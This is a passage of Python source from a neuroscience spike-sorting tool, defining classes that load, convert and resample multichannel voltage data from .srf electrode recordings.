methods to\n convert between AD and uV values, even when a Stream (where intgain and extgain\n are stored) isn't available\"\"\"\n def __init__(self, intgain, extgain):\n self.intgain = intgain\n self.extgain = extgain\n\n def AD2uV(self, AD):\n \"\"\"Convert rescaled AD values to float32 uV\n Biggest +ve voltage is 10 million uV, biggest +ve rescaled signed int16 AD val\n is half of 16 bits, then divide by internal and external gains\n\n TODO: unsure: does the DT3010 acquire from -10 to 10 V at intgain == 1 and encode\n that from 0 to 4095?\n \"\"\"\n return np.float32(AD) * 10000000 / (2**15 * self.intgain * self.extgain)\n\n def uV2AD(self, uV, inttype=np.int16):\n \"\"\"Convert uV to signed rescaled AD values of type inttype\"\"\"\n return inttype(np.round(uV * (2**15 * self.intgain * self.extgain) / 10000000))\n\n\nclass WaveForm(object):\n \"\"\"Just a container for data, std of data, timestamps, and channels.\n Sliceable in time, and indexable in channel space. Only really used for\n convenient plotting. 
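The `Converter` above maps the acquisition hardware's signed 16-bit range onto +-10 V (1e7 uV), divided by the internal and external gains; a standalone sketch of that arithmetic showing the round trip is lossless up to rounding (`ad2uv`/`uv2ad` are illustrative names, and the gain values are made up):

```python
def ad2uv(ad, intgain, extgain):
    return ad * 1e7 / (2**15 * intgain * extgain)

def uv2ad(uv, intgain, extgain):
    return int(round(uv * (2**15 * intgain * extgain) / 1e7))

# illustrative gains: intgain=8, extgain=5000
assert uv2ad(ad2uv(1234, 8, 5000), 8, 5000) == 1234
```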
Everything else uses the sort.wavedata array, and\n related sort.spikes fields\"\"\"\n def __init__(self, data=None, std=None, ts=None, chans=None):\n self.data = data # in AD, potentially multichannel, depending on shape\n self.std = std # std of data\n self.ts = ts # timestamps array in us, one for each sample (column) in data\n self.chans = chans # channel ids corresponding to rows in .data\n\n def __getitem__(self, key):\n \"\"\"Make waveform data sliceable in time, and directly indexable by channel id(s).\n Return a new WaveForm\"\"\"\n \n # check for std field, won't exist for old saved Waveforms in .sort files:\n try: self.std\n except AttributeError: self.std = None\n \n if type(key) == slice: # slice self in time\n if self.ts == None:\n return WaveForm() # empty WaveForm\n else:\n lo, hi = self.ts.searchsorted([key.start, key.stop])\n data = self.data[:, lo:hi]\n if self.std == None:\n std = None\n else:\n std = self.std[:, lo:hi]\n ts = self.ts[lo:hi]\n '''\n if np.asarray(data == self.data).all() and np.asarray(ts == self.ts).all():\n # no need for a new WaveForm, though new WaveForms aren't expensive,\n # only new data are\n return self\n '''\n # return a new WaveForm:\n return WaveForm(data=data, std=std, ts=ts, chans=self.chans)\n else: # index into self by channel id(s)\n keys = toiter(key)\n #try: assert (self.chans == np.sort(self.chans)).all() # testing code\n #except AssertionError: import pdb; pdb.set_trace() # testing code\n try:\n assert set(keys).issubset(self.chans), (\"requested channels outside of \"\n \"channels in waveform\")\n # this is fine:\n #assert len(set(keys)) == len(keys), \"same channel specified more than once\"\n except AssertionError:\n raise IndexError('invalid index %r' % key)\n #i = self.chans.searchsorted(keys) # indices into rows of data\n # best not to assume that chans are sorted, often the case in LFP data;\n # i are indices into rows of data:\n i = [ int(np.where(chan == self.chans)[0]) for chan in keys ]\n data = self.data[i] # grab the appropriate rows of data\n if self.std == None:\n std = None\n else:\n std = self.std[i]\n return WaveForm(data=data, std=std, ts=self.ts, chans=keys) # return a new WaveForm\n\n def __len__(self):\n \"\"\"Number of data points in time\"\"\"\n nt = len(self.ts)\n assert nt == self.data.shape[1] # obsessive\n return nt\n\n def _check_add_sub(self, other):\n \"\"\"Check a few things before adding or subtracting waveforms\"\"\"\n if self.data.shape != other.data.shape:\n raise ValueError(\"Waveform shapes %r and %r don't match\" %\n (self.data.shape, other.data.shape))\n if self.chans != other.chans:\n raise ValueError(\"Waveform channel ids %r and %r don't match\" %\n (self.chans, other.chans))\n\n def __add__(self, other):\n \"\"\"Return new waveform which is self+other. Keep self's timestamps\"\"\"\n self._check_add_sub(other)\n return WaveForm(data=self.data+other.data,\n ts=self.ts, chans=self.chans)\n\n def __sub__(self, other):\n \"\"\"Return new waveform which is self-other. 
Keep self's timestamps\"\"\"\n self._check_add_sub(other)\n return WaveForm(data=self.data-other.data,\n ts=self.ts, chans=self.chans)\n '''\n def get_padded_data(self, chans):\n \"\"\"Return self.data corresponding to self.chans,\n padded with zeros for chans that don't exist in self\"\"\"\n common = set(self.chans).intersection(chans) # overlapping chans\n dtype = self.data.dtype # self.data corresponds to self.chans\n # padded_data corresponds to chans:\n padded_data = np.zeros((len(chans), len(self.ts)), dtype=dtype)\n chanis = [] # indices into self.chans corresponding to overlapping chans\n commonis = [] # indices into chans corresponding to overlapping chans\n for chan in common:\n chani, = np.where(chan == np.asarray(self.chans))\n commoni, = np.where(chan == np.asarray(chans))\n chanis.append(chani)\n commonis.append(commoni)\n chanis = np.concatenate(chanis)\n commonis = np.concatenate(commonis)\n # for overlapping chans, overwrite the zeros with data:\n padded_data[commonis] = self.data[chanis]\n return padded_data\n '''\n\nclass TrackStream(object):\n \"\"\"A collection of streams, all from the same track. This is used to simultaneously\n cluster all spikes from many (or all) recordings from the same track. Designed to have\n as similar an interface as possible to a normal Stream. srffs needs to be a list of\n open and parsed surf.File objects, in temporal order\"\"\"\n def __init__(self, srffs, trackfname, kind='highpass', sampfreq=None, shcorrect=None):\n # to prevent pickling problems, don't bind srffs\n self.fname = trackfname\n self.kind = kind\n streams = []\n self.streams = streams # bind right away so setting sampfreq and shcorrect will work\n # collect appropriate streams from srffs\n if kind == 'highpass':\n for srff in srffs:\n streams.append(srff.hpstream)\n elif kind == 'lowpass':\n for srff in srffs:\n streams.append(srff.lpstream)\n else: raise ValueError('Unknown stream kind %r' % kind)\n\n datetimes = [stream.datetime for stream in streams]\n if not (np.diff(datetimes) >= timedelta(0)).all():\n raise RuntimeError(\".srf files aren't in temporal order\")\n\n \"\"\"Generate tranges, an array of all the contiguous data ranges in all the\n streams in self. These are relative to the start of acquisition (t=0) in the first\n stream. Also generate streamtranges, an array of each stream's t0 and t1\"\"\"\n tranges = []\n streamtranges = []\n for stream in streams:\n td = stream.datetime - datetimes[0] # time delta between stream i and stream 0\n for trange in stream.tranges:\n t0 = td2usec(td + timedelta(microseconds=int(trange[0])))\n t1 = td2usec(td + timedelta(microseconds=int(trange[1])))\n tranges.append([t0, t1])\n streamt0 = td2usec(td + timedelta(microseconds=int(stream.t0)))\n streamt1 = td2usec(td + timedelta(microseconds=int(stream.t1)))\n streamtranges.append([streamt0, streamt1])\n self.tranges = np.int64(tranges)\n self.streamtranges = np.int64(streamtranges)\n self.t0 = self.streamtranges[0, 0]\n self.t1 = self.streamtranges[-1, 1]\n\n self.layout = streams[0].layout # assume they're identical\n intgains = np.asarray([ stream.converter.intgain for stream in streams ])\n if max(intgains) != min(intgains):\n import pdb; pdb.set_trace() # investigate which are the deviant .srf files\n raise NotImplementedError(\"not all .srf files have the same intgain\")\n # TODO: find recording with biggest intgain, call that value maxintgain. For each\n # recording, scale its AD values by its intgain/maxintgain when returning a slice\n # from its stream. 
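`TrackStream.__init__` above rebases every stream's time ranges onto the first stream's clock by adding the `datetime` difference, converted to integer microseconds via `td2usec` (defined elsewhere in the package). A sketch of that conversion under the assumption it is the usual `total_seconds()`-based one:

```python
from datetime import datetime

def td2usec_sketch(td):
    # assumed behaviour of the package's td2usec: a timedelta as a
    # whole number of microseconds
    return int(round(td.total_seconds() * 1e6))

t0 = datetime(2010, 5, 1, 12, 0, 0)    # first stream's datetime
t1 = datetime(2010, 5, 1, 12, 0, 30)   # a later stream's datetime
assert td2usec_sketch(t1 - t0) == 30000000
```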
Note that this ratio should always be a factor of 2, so all you\n # have to do is bitshift, I think. Then, have a single converter for the\n # trackstream whose intgain value is set to maxintgain\n self.converter = streams[0].converter # they're identical\n self.srffnames = [srff.fname for srff in srffs]\n self.rawsampfreq = streams[0].rawsampfreq # assume they're identical\n self.rawtres = streams[0].rawtres # assume they're identical\n contiguous = np.asarray([stream.contiguous for stream in streams])\n if not contiguous.all() and kind == 'highpass':\n # don't bother reporting again for lowpass\n fnames = [ s.fname for s, c in zip(streams, contiguous) if not c ]\n print(\"some .srf files are non contiguous:\")\n for fname in fnames:\n print(fname)\n probe = streams[0].probe\n if not np.all([type(probe) == type(stream.probe) for stream in streams]):\n raise RuntimeError(\"some .srf files have different probe types\")\n self.probe = probe # they're identical\n\n # set sampfreq and shcorrect for all streams\n if kind == 'highpass':\n self.sampfreq = sampfreq or DEFHIGHPASSSAMPFREQ # desired sampling frequency\n self.shcorrect = shcorrect or DEFHIGHPASSSHCORRECT\n else: # kind == 'lowpass'\n self.sampfreq = sampfreq or self.rawsampfreq # don't resample by default\n self.shcorrect = shcorrect or False # don't s+h correct by default\n\n def is_open(self):\n return np.all([stream.is_open() for stream in self.streams])\n\n def open(self):\n for stream in self.streams:\n stream.open()\n\n def close(self):\n for stream in self.streams:\n stream.close()\n\n def get_dt(self):\n \"\"\"Get self's duration\"\"\"\n return self.t1 - self.t0\n\n dt = property(get_dt)\n\n def get_chans(self):\n return self.streams[0].chans # assume they're identical\n\n def set_chans(self, chans):\n for stream in self.streams:\n stream.chans = chans\n\n chans = property(get_chans, set_chans)\n\n def get_nchans(self):\n return len(self.chans)\n\n nchans = property(get_nchans)\n\n def get_sampfreq(self):\n return self.streams[0].sampfreq # they're identical\n\n def set_sampfreq(self, sampfreq):\n for stream in self.streams:\n stream.sampfreq = sampfreq\n\n sampfreq = property(get_sampfreq, set_sampfreq)\n\n def get_tres(self):\n return self.streams[0].tres # they're identical\n\n tres = property(get_tres)\n\n def get_shcorrect(self):\n return self.streams[0].shcorrect # they're identical\n\n def set_shcorrect(self, shcorrect):\n for stream in self.streams:\n stream.shcorrect = shcorrect\n\n shcorrect = property(get_shcorrect, set_shcorrect)\n '''\n # having this would make sense, but it isn't currently needed:\n def get_datetime(self):\n return self.streams[0].datetime # datetime of first stream\n\n datetime = property(get_datetime)\n '''\n def pickle(self):\n \"\"\"Just a way to pickle all the .srf files associated with self\"\"\"\n for stream in self.streams:\n stream.pickle()\n\n def __getitem__(self, key):\n \"\"\"Called when Stream object is indexed into using [] or with a slice object,\n indicating start and end timepoints in us. 
Returns the corresponding WaveForm\n object with the full set of chans\"\"\"\n if key.step not in [None, 1]:\n raise ValueError('unsupported slice step size: %s' % key.step)\n return self(key.start, key.stop, self.chans)\n\n def __call__(self, start, stop, chans=None):\n \"\"\"Figure out which stream(s) the slice spans (usually just one, sometimes 0 or\n 2), send the request to the stream(s), generate the appropriate timestamps, and\n return the waveform\"\"\"\n if chans == None:\n chans = self.chans\n if not set(chans).issubset(self.chans):\n raise ValueError(\"requested chans %r are not a subset of available enabled \"\n \"chans %r in %s stream\" % (chans, self.chans, self.kind))\n nchans = len(chans)\n start, stop = max(start, self.t0), min(stop, self.t1) # stay in bounds\n streamis = []\n ## TODO: this could probably be more efficient by not iterating over all streams:\n for streami, trange in enumerate(self.streamtranges):\n if (trange[0] <= start < trange[1]) or (trange[0] <= stop < trange[1]):\n streamis.append(streami)\n tres = self.tres\n ts = np.arange(start, stop, tres)\n data = np.zeros((nchans, len(ts)), dtype=np.int16) # any gaps will have zeros\n for streami in streamis:\n stream = self.streams[streami]\n abst0 = self.streamtranges[streami, 0] # absolute start time of stream\n # find start and end offsets relative to abst0\n relt0 = max(start - abst0, 0) # stay within stream's lower limit\n relt1 = min(stop - abst0, stream.t1 - stream.t0) # stay within stream's upper limit\n # source slice times:\n st0 = relt0 + stream.t0\n st1 = relt1 + stream.t0\n sdata = stream(st0, st1, chans).data # source data\n # destination time indices:\n dt0i = (abst0 + relt0 - start) // tres # absolute index\n dt1i = dt0i + sdata.shape[1]\n data[:, dt0i:dt1i] = sdata\n return WaveForm(data=data, ts=ts, chans=chans)\n\n\nclass Stream(object):\n \"\"\"Data stream object - provides convenient stream interface to .srf files.\n Maps from timestamps to record index of stream data to retrieve the\n approriate range of waveform data from disk\"\"\"\n def __init__(self, srff, kind='highpass', sampfreq=None, shcorrect=None):\n \"\"\"Takes a sorted temporal (not necessarily evenly-spaced, due to pauses in recording)\n sequence of ContinuousRecords: either HighPassRecords or LowPassMultiChanRecords.\n sampfreq arg is useful for interpolation. Assumes that all HighPassRecords belong\n to the same probe. srff must be open and parsed\"\"\"\n self.srff = srff\n self.kind = kind\n if kind == 'highpass':\n self.records = srff.highpassrecords\n elif kind == 'lowpass':\n self.records = srff.lowpassmultichanrecords\n else: raise ValueError('Unknown stream kind %r' % kind)\n\n # assume same layout for all records of type \"kind\"\n self.layout = self.srff.layoutrecords[self.records['Probe'][0]]\n intgain = self.layout.intgain\n extgain = int(self.layout.extgain[0]) # assume same extgain for all chans in layout\n self.converter = Converter(intgain, extgain)\n self.nADchans = self.layout.nchans # always constant\n self.rawsampfreq = self.layout.sampfreqperchan\n self.rawtres = intround(1 / self.rawsampfreq * 1e6) # us\n if kind == 'highpass':\n ADchans = self.layout.ADchanlist\n if list(self.layout.ADchanlist) != range(self.nADchans):\n print(\"WARNING: ADchans aren't contiguous from 0, highpass recordings are \"\n \"nonstandard. Sample and hold delay correction in self.resample() \"\n \"may not be exactly correct\")\n # probe chans, as opposed to AD chans. 
Most probe types are contiguous from 0,\n # but there are some exceptions (like pt16a_HS27 and pt16b_HS27):\n self.chans = np.arange(self.nADchans)\n self.sampfreq = sampfreq or DEFHIGHPASSSAMPFREQ # desired sampling frequency\n self.shcorrect = shcorrect or DEFHIGHPASSSHCORRECT\n else: # kind == 'lowpass'\n # probe chan values are already parsed from LFP probe description\n self.chans = self.layout.chans\n self.sampfreq = sampfreq or self.rawsampfreq # don't resample by default\n self.shcorrect = shcorrect or False # don't s+h correct by default\n probename = self.layout.electrode_name\n probename = probename.replace(MU, 'u') # replace any 'micro' symbols with 'u'\n probetype = eval('probes.' + probename) # yucky. TODO: switch to a dict with keywords?\n self.probe = probetype() # instantiate it\n\n rts = self.records['TimeStamp'] # array of record timestamps\n NumSamples = np.unique(self.records['NumSamples'])\n if len(NumSamples) > 1:\n raise RuntimeError(\"Not all continuous records are of the same length. \"\n \"NumSamples = %r\" % NumSamples)\n rtlen = NumSamples / self.nADchans * self.rawtres\n # Check whether rts values are all equally spaced, indicating there were no\n # pauses in recording\n diffrts = np.diff(rts)\n self.contiguous = (np.diff(diffrts) == 0).all() # could also call diff(rts, n=2)\n if self.contiguous:\n try: assert np.unique(diffrts) == rtlen\n except AssertionError: import pdb; pdb.set_trace()\n self.tranges = np.int64([[rts[0], rts[-1]+rtlen]]) # keep it 2D\n else:\n if kind == 'highpass': # don't bother reporting again for lowpass\n print('NOTE: time gaps exist in %s, possibly due to pauses' % self.fname)\n # build up self.tranges\n splitis = np.where(diffrts != rtlen)[0] + 1\n splits = np.split(rts, splitis) # list of arrays of contiguous rts\n tranges = []\n for split in splits: # for each array of contiguous rts\n tranges.append([split[0], split[-1]+rtlen])\n self.tranges = np.int64(tranges)\n self.t0 = self.tranges[0, 0]\n self.t1 = self.tranges[-1, 1]\n\n def is_open(self):\n return self.srff.is_open()\n\n def open(self):\n self.srff.open()\n\n def close(self):\n self.srff.close()\n\n def get_dt(self):\n \"\"\"Get self's duration\"\"\"\n return self.t1 - self.t0\n\n dt = property(get_dt)\n\n def get_fname(self):\n return self.srff.fname\n\n fname = property(get_fname)\n\n def get_srffnames(self):\n return [self.srff.fname]\n\n srffnames = property(get_srffnames)\n\n def get_srcfnameroot(self):\n \"\"\"Get root of filename of source data. 
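The gap detection in `Stream.__init__` above is a compact numpy idiom: consecutive record timestamps that are not exactly one record-length apart mark a pause, and `np.split` carves the array into contiguous runs at those points. A self-contained sketch with fake timestamps:

```python
import numpy as np

rts = np.array([0, 100, 200, 500, 600])   # record timestamps, us
rtlen = 100                               # duration of one record, us
splitis = np.where(np.diff(rts) != rtlen)[0] + 1
runs = np.split(rts, splitis)             # contiguous runs of records
tranges = np.int64([[run[0], run[-1] + rtlen] for run in runs])
assert tranges.tolist() == [[0, 300], [500, 700]]
```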
Also filter it to make recording\n names from older .srf files more succint\"\"\"\n srcfnameroot = lrstrip(self.fname, '../', '.srf')\n srcfnameroot = srcfnameroot.replace(' - track 5 ', '-tr5-')\n srcfnameroot = srcfnameroot.replace(' - track 6 ', '-tr6-')\n srcfnameroot = srcfnameroot.replace(' - track 7c ', '-tr7c-')\n # replace any remaining spaces with underscores\n srcfnameroot = srcfnameroot.replace(' ', '_')\n return srcfnameroot\n\n srcfnameroot = property(get_srcfnameroot)\n\n def get_nchans(self):\n return len(self.chans)\n\n nchans = property(get_nchans)\n\n def get_sampfreq(self):\n return self._sampfreq\n\n def set_sampfreq(self, sampfreq):\n \"\"\"On .sampfreq change, delete .kernels (if set), and update .tres\"\"\"\n self._sampfreq = sampfreq\n try:\n del self.kernels\n except AttributeError:\n pass\n self.tres = intround(1 / self.sampfreq * 1e6) # us, for convenience\n\n sampfreq = property(get_sampfreq, set_sampfreq)\n\n def get_shcorrect(self):\n return self._shcorrect\n\n def set_shcorrect(self, shcorrect):\n \"\"\"On .shcorrect change, deletes .kernels (if set)\"\"\"\n self._shcorrect = shcorrect\n try:\n del self.kernels\n except AttributeError:\n pass\n\n shcorrect = property(get_shcorrect, set_shcorrect)\n\n def get_datetime(self):\n return self.srff.datetime\n\n datetime = property(get_datetime)\n\n def pickle(self):\n self.srff.pickle()\n\n def __getitem__(self, key):\n \"\"\"Called when Stream object is indexed into using [] or with a slice object,\n indicating start and end timepoints in us. Returns the corresponding WaveForm\n object with the full set of chans\"\"\"\n if key.step not in [None, 1]:\n raise ValueError('unsupported slice step size: %s' % key.step)\n return self(key.start, key.stop, self.chans)\n\n def __call__(self, start, stop, chans=None):\n \"\"\"Called when Stream object is called using (). start and stop indicate start\n and end timepoints in us. Returns the corresponding WaveForm object with just the\n specificed chans\"\"\"\n if chans == None:\n chans = self.chans\n if not set(chans).issubset(self.chans):\n raise ValueError(\"requested chans %r are not a subset of available enabled \"\n \"chans %r in %s stream\" % (chans, self.chans, self.kind))\n nchans = len(chans)\n rawtres = self.rawtres\n resample = self.sampfreq != self.rawsampfreq or self.shcorrect == True\n if resample:\n # excess data in us at either end, to eliminate interpolation distortion at\n # key.start and key.stop\n xs = KERNELSIZE * rawtres\n else:\n xs = 0\n # get a slightly greater range of raw data (with xs) than might be needed:\n t0xsi = (start - xs) // rawtres # round down to nearest mult of rawtres\n t1xsi = ((stop + xs) // rawtres) + 1 # round up to nearest mult of rawtres\n # stay within stream limits, thereby avoiding interpolation edge effects:\n t0xsi = max(t0xsi, self.t0 // rawtres)\n t1xsi = min(t1xsi, self.t1 // rawtres)\n # convert back to us:\n t0xs = t0xsi * rawtres\n t1xs = t1xsi * rawtres\n tsxs = np.arange(t0xs, t1xs, rawtres)\n ntxs = len(tsxs)\n # init data as int32 so we have bitwidth to rescale and zero, then convert to int16\n dataxs = np.zeros((nchans, ntxs), dtype=np.int32) # any gaps will have zeros\n\n # Find all contiguous tranges that t0xs and t1xs span, if any. Note that this\n # can now deal with case where len(trangeis) > 1. 
Test by asking for a slice\n # longer than any one trange or gap between tranges, like by calling:\n # >>> self.hpstream(201900000, 336700000)\n # on file ptc15.74.\n trangeis, = np.where((self.tranges[:, 0] <= t1xs) & (t0xs < self.tranges[:, 1]))\n tranges = []\n if len(trangeis) > 0:\n tranges = self.tranges[trangeis]\n #print('tranges:'); print(tranges)\n # collect relevant records from spanned tranges, if any:\n records = []\n for trange in tranges:\n trrec0i, trrec1i = self.records['TimeStamp'].searchsorted(trange)\n trrecis = np.arange(trrec0i, trrec1i)\n trrts = self.records['TimeStamp'][trrecis]\n trrecs = self.records[trrecis]\n rec0i, rec1i = trrts.searchsorted([t0xs, t1xs])\n rec0i = max(rec0i-1, 0)\n recis = np.arange(rec0i, rec1i)\n records.append(trrecs[recis])\n if len(records) > 0:\n records = np.concatenate(records)\n\n # load up data+excess, from all relevant records\n # TODO: fix code duplication\n #tload = time.time()\n if self.kind == 'highpass': # straightforward\n chanis = self.layout.ADchanlist.searchsorted(chans)\n for record in records: # iterating over highpass records\n d = self.srff.loadContinuousRecord(record)[chanis] # record's data on chans\n nt = d.shape[1]\n t0i = record['TimeStamp'] // rawtres\n t1i = t0i + nt\n # source indices\n st0i = max(t0xsi - t0i, 0)\n st1i = min(t1xsi - t0i, nt)\n # destination indices\n dt0i = max(t0i - t0xsi, 0)\n dt1i = min(t1i - t0xsi, ntxs)\n dataxs[:, dt0i:dt1i] = d[:, st0i:st1i]\n else: # kind == 'lowpass', need to load chans from subsequent records\n chanis = [ int(np.where(chan == self.layout.chans)[0]) for chan in chans ]\n \"\"\"NOTE: if the above raises an error it may be because this particular\n combination of LFP chans was incorrectly parsed due to a bug in the .srf file,\n and a manual remapping needs to be added to Surf.File.fixLFPlabels()\"\"\"\n # assume all lpmc records are same length:\n nt = records[0]['NumSamples'] / self.nADchans\n d = np.zeros((nchans, nt), dtype=np.int32)\n for record in records: # iterating over lowpassmultichan records\n for i, chani in enumerate(chanis):\n lprec = self.srff.lowpassrecords[record['lpreci']+chani]\n d[i] = self.srff.loadContinuousRecord(lprec)\n t0i = record['TimeStamp'] // rawtres\n t1i = t0i + nt\n # source indices\n st0i = max(t0xsi - t0i, 0)\n st1i = min(t1xsi - t0i, nt)\n # destination indices\n dt0i = max(t0i - t0xsi, 0)\n dt1i = min(t1i - t0xsi, ntxs)\n dataxs[:, dt0i:dt1i] = d[:, st0i:st1i]\n #print('record.load() took %.3f sec' % (time.time()-tload))\n\n # bitshift left to scale 12 bit values to use full 16 bit dynamic range, same as\n # * 2**(16-12) == 16. This provides more fidelity for interpolation, reduces uV per\n # AD to about 0.02\n dataxs <<= 4 # data is still int32 at this point\n\n # do any resampling if necessary:\n if resample:\n #tresample = time.time()\n dataxs, tsxs = self.resample(dataxs, tsxs, chans)\n #print('resample took %.3f sec' % (time.time()-tresample))\n\n # now trim down to just the requested time range:\n lo, hi = tsxs.searchsorted([start, stop])\n data = dataxs[:, lo:hi]\n ts = tsxs[lo:hi]\n\n # should be safe to convert back down to int16 now:\n data = np.int16(data)\n return WaveForm(data=data, ts=ts, chans=chans)\n\n def resample(self, rawdata, rawts, chans):\n \"\"\"Return potentially sample-and-hold corrected and Nyquist interpolated\n data and timepoints. 
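The `dataxs <<= 4` step above rescales 12-bit samples into the full signed 16-bit range (a left shift by 4 is a multiply by `2**(16-12)`), buying headroom for interpolation; a two-line check of the extremes:

```python
import numpy as np

d = np.array([-2048, 0, 2047], dtype=np.int32)  # 12-bit extremes
d <<= 4                                         # in-place multiply by 16
assert d.tolist() == [-32768, 0, 32752]
```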
See Blanche & Swindale, 2006\"\"\"\n #print('sampfreq, rawsampfreq, shcorrect = (%r, %r, %r)' %\n # (self.sampfreq, self.rawsampfreq, self.shcorrect))\n rawtres = self.rawtres # us\n tres = self.tres # us\n # resample factor: n output resampled points per input raw point:\n resamplex = intround(self.sampfreq / self.rawsampfreq)\n assert resamplex >= 1, 'no decimation allowed'\n N = KERNELSIZE\n\n # check if kernels have been generated already\n try:\n self.kernels\n except AttributeError:\n self.kernels = self.get_kernels(self.layout.ADchanlist, resamplex, N)\n\n # convolve the data with each kernel\n nrawts = len(rawts)\n nchans = len(chans)\n # all the interpolated points have to fit in between the existing raw\n # points, so there's nrawts - 1 of each of the interpolated points:\n #nt = nrawts + (resamplex-1) * (nrawts - 1)\n # the above can be simplified to:\n nt = nrawts*resamplex - resamplex + 1\n tstart = rawts[0]\n ts = np.arange(tstart, tstart+tres*nt, tres) # generate interpolated timepoints\n #print 'len(ts) is %r' % len(ts)\n assert len(ts) == nt\n # resampled data, leave as int32 for convolution, then convert to int16:\n data = np.empty((nchans, nt), dtype=np.int32)\n #print 'data.shape = %r' % (data.shape,)\n #tconvolve = time.time()\n tconvolvesum = 0\n # Only the chans that are actually needed are resampled and returned.\n # Assume that chans index into ADchans. Normally they should map 1 to 1, ie chan 0\n # taps off of ADchan 0, but for probes like pt16a_HS27 and pt16b_HS27, it seems\n # ADchans start at 4. However, because self.kernels is indexed into using chans, and\n # chans are always assumed to be contiguous from 0, this shouldn't cause a problem\n for chani, chan in enumerate(chans):\n for point, kernel in enumerate(self.kernels[chan]):\n \"\"\"np.convolve(a, v, mode)\n for mode='same', only the K middle values are returned starting at n = (M-1)/2\n where K = len(a)-1 and M = len(v) - 1 and K >= M\n for mode='valid', you get the middle len(a) - len(v) + 1 number of values\"\"\"\n #tconvolveonce = time.time()\n row = np.convolve(rawdata[chani], kernel, mode='same')\n #tconvolvesum += (time.time()-tconvolveonce)\n #print 'len(rawdata[chani]) = %r' % len(rawdata[chani])\n #print 'len(kernel) = %r' % len(kernel)\n #print 'len(row): %r' % len(row)\n # interleave by assigning from point to end in steps of resamplex\n # index to start filling data from for this kernel's points:\n ti0 = (resamplex - point) % resamplex\n # index of first data point to use from convolution result 'row':\n rowti0 = int(point > 0)\n # discard the first data point from interpolant's convolutions, but not for\n # raw data's convolutions, since interpolated values have to be bounded on both\n # sides by raw values?\n data[chani, ti0::resamplex] = row[rowti0:]\n #print('convolve loop took %.3f sec' % (time.time()-tconvolve))\n #print('convolve calls took %.3f sec total' % (tconvolvesum))\n #tundoscaling = time.time()\n data >>= 16 # undo kernel scaling, shift 16 bits right in place, same as //= 2**16\n #print('undo kernel scaling took %.3f sec total' % (time.time()-tundoscaling))\n return data, ts\n\n def get_kernels(self, ADchans, resamplex, N):\n \"\"\"Generate a different set of kernels for each ADchan to correct each ADchan's\n s+h delay. 
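# Minimal sketch of one windowed-sinc interpolation kernel as built in
# get_kernels() here: a normalized sinc offset by the resample-point fraction
# t0 plus the per-channel s+h delay d, under a Hamming window. Names and the
# N=12 default are illustrative.
import numpy as np

def hamming_win(t, N):
    return 0.54 - 0.46 * np.cos(np.pi * (2*t + N) / N)

def sinc_kernel(point, resamplex, d, N=12):
    t0 = point / resamplex                  # fraction of one raw sample period
    tstart = -N/2 - t0 - d
    t = np.arange(tstart, tstart + N + 1, 1, dtype=np.float32)  # N+1 taps
    kernel = hamming_win(t, N) * np.sinc(t)      # windowed sinc, peak ~1.0
    return np.int32(np.round(kernel * 2**16))    # fixed point; undone by >> 16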
ADchans may not always be contiguous from 0, but chans are assumed\n to always be, and to always be in same order as ADchans.\n\n TODO: when resamplex > 1 and shcorrect == False, you only need resamplex - 1 kernels.\n You don't need a kernel for the original raw data points. Those won't be shifted,\n so you can just interleave appropriately.\n\n TODO: take DIN channel into account, might need to shift all highpass ADchans\n by 1us, see line 2412 in SurfBawdMain.pas. I think the layout.sh_delay_offset field\n may tell you if and by how much you should take this into account\n\n WARNING! TODO: not sure if say ADchan 4 will always have a delay of 4us, or only if\n it's preceded by AD chans 0, 1, 2 and 3 in the channel gain list - I suspect the latter\n is the case, but right now I'm coding the former. Note that there's a\n srff.layout.sh_delay_offset field that describes the sh delay for first chan of probe.\n Should probably take this into account, although it doesn't affect relative delays\n between chans, I think. I think it's usually 1us.\n \"\"\"\n # ordinal position of each ADchan in the hold queue of its ADC board:\n i = ADchans % NCHANSPERBOARD\n if self.shcorrect:\n dis = 1 * i # per channel delays, us\n # TODO: stop hard coding 1us delay per ordinal position\n else:\n dis = 0 * i\n ds = dis / self.rawtres # normalized per channel delays\n wh = hamming # window function\n h = np.sinc # sin(pi*t) / pi*t\n kernels = [] # list of array of kernels, indexed by [chan][resample point]\n for d in ds: # delay for this ADchan\n kernelrow = []\n for point in xrange(resamplex): # iterate over resampled points per raw point\n t0 = point/resamplex # some fraction of 1\n tstart = -N/2 - t0 - d\n tend = tstart + (N+1)\n # kernel sample timepoints, all of length N+1, float32s to match voltage\n # data type\n t = np.arange(tstart, tend, 1, dtype=np.float32)\n kernel = wh(t, N) * h(t) # windowed sinc, sums to 1.0, max val is 1.0\n # rescale to get values up to 2**16, convert to int32\n kernel = np.int32(np.round(kernel * 2**16))\n kernelrow.append(kernel)\n kernels.append(kernelrow)\n return kernels\n\n\nclass SimpleStream(Stream):\n \"\"\"Simple Stream loaded fully in advance\"\"\"\n def __init__(self, fname, wavedata, siteloc, rawsampfreq, masterclockfreq,\n intgain, extgain, sampfreq=None, shcorrect=None, bitshift=4):\n self._fname = fname\n self.wavedata = wavedata\n nchans, nt = wavedata.shape\n self.chans = np.arange(nchans) # this sets self.nchans\n self.nt = nt\n self.nADchans = self.nchans\n self.ADchans = np.arange(self.nADchans)\n self.layout = EmptyClass()\n self.layout.ADchanlist = self.ADchans # for the sake of self.resample()\n probematch = False\n for probetype in probes.TYPES:\n probe = probetype()\n if (probe.siteloc_arr() == siteloc).all():\n self.probe = probe\n probematch = True\n break\n if not probematch:\n raise ValueError(\"siteloc in %s doesn't match known probe type\" % fname)\n self.rawsampfreq = rawsampfreq\n self.rawtres = intround(1 / self.rawsampfreq * 1e6) # us\n self.masterclockfreq = masterclockfreq\n self.extgain = extgain\n self.intgain = intgain\n self.converter = Converter(intgain, extgain)\n self.sampfreq = sampfreq or DEFHIGHPASSSAMPFREQ # desired sampling frequency\n self.shcorrect = shcorrect or DEFHIGHPASSSHCORRECT\n self.bitshift = bitshift\n self.t0 = 0 # us\n self.t1 = nt * self.rawtres\n self.tranges = np.int64([[self.t0, self.t1]])\n\n def open(self):\n pass\n\n def is_open(self):\n return True\n\n def close(self):\n pass\n\n def get_fname(self):\n 
